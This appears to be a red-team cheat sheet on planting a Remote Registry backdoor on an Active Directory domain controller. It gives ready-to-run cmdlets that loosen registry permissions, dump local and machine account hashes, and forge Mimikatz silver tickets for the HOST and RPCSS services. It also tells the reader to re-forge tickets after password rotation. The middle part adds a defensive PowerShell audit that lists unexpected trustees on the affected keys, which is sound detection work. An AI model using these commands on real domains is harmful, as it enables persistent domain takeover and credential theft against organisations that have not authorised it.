REMOTE REGISTRY BACKDOOR
This is a Domain Persistence technique.
The backdoor is added through the Remote Registry service of the Domain Controller: the DACLs on the registry keys that gate remote registry access (winreg) and that hold the SAM, SECURITY and bootkey material are loosened so that a chosen trustee can read them remotely later, without local admin rights on the DC. The cmdlets below come from the DAMP toolkit.
(Adding the backdoor needs Domain Administrator privilege, i.e. local admin on the DC; using it afterwards only needs the trustee's credentials)
Add-RemoteRegBackdoor -ComputerName <DC FQDN> -Trustee <USERNAME>
Retrieving the DC's local account hashes remotely, running as the backdoor trustee, at any time while the backdoor persists (the ACL change survives reboots)
Get-RemoteLocalAccountHash -ComputerName <DC FQDN>
Retrieving the DC's machine account hash remotely, running as the backdoor trustee, at any time while the backdoor persists
Get-RemoteMachineAccountHash -ComputerName <DC FQDN>
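As an added check (not part of the original page and not one of the DAMP cmdlets), the following PowerShell enumerates the DACLs on the registry keys this backdoor touches and reports any trustee that is not in an assumed default baseline. It is the audit a defender or a red teamer cleaning up would run against a DC. The key list is the set this technique modifies; $DefaultTrustees is an assumed baseline and the computer name dc01.corp.local is a placeholder, so adjust both to your environment.

```powershell
# Added audit check, not DAMP code: list non-default trustees on the registry keys
# the Remote Registry backdoor loosens. Needs Remote Registry reachable on the target
# and an account allowed to read the keys' security descriptors (READ_CONTROL).
function Find-RemoteRegBackdoor {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        # Assumed baseline of principals that normally appear on these keys;
        # tune to a known-good DC in your own environment.
        [string[]]$DefaultTrustees = @(
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators',
            'NT AUTHORITY\LOCAL SERVICE',
            'NT AUTHORITY\NETWORK SERVICE',
            'BUILTIN\Backup Operators',
            'CREATOR OWNER',
            'APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES',
            'BUILTIN\Users'
        )
    )

    # Keys whose DACLs the backdoor changes (all under HKLM)
    $keys = @(
        'SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',  # gates Remote Registry access
        'SAM',                                                        # local account hashes
        'SECURITY',                                                   # machine account hash / LSA secrets / cached creds
        'SYSTEM\CurrentControlSet\Control\Lsa\JD',                    # bootkey pieces
        'SYSTEM\CurrentControlSet\Control\Lsa\Skew1',
        'SYSTEM\CurrentControlSet\Control\Lsa\GBG',
        'SYSTEM\CurrentControlSet\Control\Lsa\Data'
    )

    $hive = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    try {
        foreach ($path in $keys) {
            # Open for READ_CONTROL only; we never need to read the key's values.
            $key = $hive.OpenSubKey($path,
                [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
                [System.Security.AccessControl.RegistryRights]::ReadPermissions)
            if (-not $key) {
                Write-Warning "$ComputerName : cannot open HKLM\$path (access denied or missing)"
                continue
            }
            $acl = $key.GetAccessControl(
                [System.Security.AccessControl.AccessControlSections]::Access)
            foreach ($ace in $acl.Access) {
                $who = $ace.IdentityReference.Value
                if ($DefaultTrustees -notcontains $who) {
                    # Anything here is a candidate backdoor trustee; review the rights granted.
                    [pscustomobject]@{
                        ComputerName = $ComputerName
                        Key          = "HKLM\$path"
                        Trustee      = $who
                        Rights       = $ace.RegistryRights
                        AccessType   = $ace.AccessControlType
                        Inherited    = $ace.IsInherited
                    }
                }
            }
            $key.Close()
        }
    } finally {
        $hive.Close()
    }
}

# Example run (placeholder DC name); an empty result means no unexpected trustees.
Find-RemoteRegBackdoor -ComputerName 'dc01.corp.local' | Format-Table -AutoSize
```

A hit on winreg plus SAM, SECURITY and the four Lsa bootkey keys for the same low-privileged principal is the pattern this backdoor leaves; a hit on winreg alone is more often an admin enabling remote registry for a monitoring account, so compare against a known-good DC before acting.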
The Domain Controller's machine account hash can be used for a Silver Ticket attack: a forged service ticket signed with the machine account's NTLM hash, which the DC's services accept without checking back with the KDC. Note that the machine account password rotates every 30 days by default, so the ticket stops working after rotation; the backdoor persists, so simply retrieve the new hash and forge again.
Creating a silver ticket to abuse the "HOST" service (scheduled tasks, etc.)
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:HOST /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'
Creating a silver ticket to abuse the "RPCSS" service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:RPCSS /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'
With the RPCSS silver ticket in the session, WMI calls can be made against the DC. In practice WMI (DCOM) needs both the HOST and the RPCSS tickets, so inject both with /ptt before querying; check what is loaded with klist.